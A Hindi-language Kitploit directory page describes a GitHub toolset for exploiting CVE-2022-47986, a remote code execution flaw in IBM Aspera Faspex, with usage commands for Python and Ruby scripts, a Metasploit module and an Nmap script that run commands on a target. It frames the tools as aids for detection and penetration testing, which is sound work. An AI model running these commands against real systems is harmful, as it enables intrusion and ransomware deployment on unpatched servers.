Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-47986 — CVE-2022-47986: Python, Ruby, NMAP और Metasploit मॉड्यूल जो इस भेद्यता का शोषण करने के लिए हैं। | Kitploit
उपकरण/GitHubGitHub/mauricelambert/cve-2022-47986
शोषण फ्रेमवर्कशोषणवेब एप्लिकेशन शोषण
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986: Python, Ruby, NMAP और Metasploit मॉड्यूल जो इस भेद्यता का शोषण करने के लिए हैं।

रिपॉजिटरी देखें
2193 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-47986

क्यों

यह भेद्यता वास्तविक दुनिया में शोषित की जा रही है। IceFire इस भेद्यता का उपयोग लक्षित सिस्टम पर रैनसमवेयर तैनात करने के लिए करता है, मैं SOC/ब्लू टीमों को प्रभावित सिस्टम की पहचान करने और पेंटेस्टर/रेड टीमों को इसका शोषण करने और रिपोर्ट करने में मदद करना चाहता हूँ।

विवरण

मैं YAML डिसेरिएलाइज़ेशन से IBM Aspera Faspex पर RCE (दूरस्थ कोड निष्पादन) उत्पन्न करने वाली भेद्यता का शोषण करने के लिए शुद्ध पायथन और रूबी स्क्रिप्ट, मेटास्प्लॉइट और nmap मॉड्यूल प्रस्तावित करता हूँ।

शोषण: RCE (दूरस्थ कोड निष्पादन)

Python

python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

स्रोत

  • IBM
  • nvd.nist.gov
  • ब्लॉग - शोषण
  • thehackernews - icefire द्वारा शोषित
  • thehackernews - CISA KEV कैटलॉग

लाइसेंस

GPL, संस्करण 3 के अंतर्गत लाइसेंस प्राप्त।

टूल डाउनलोड करें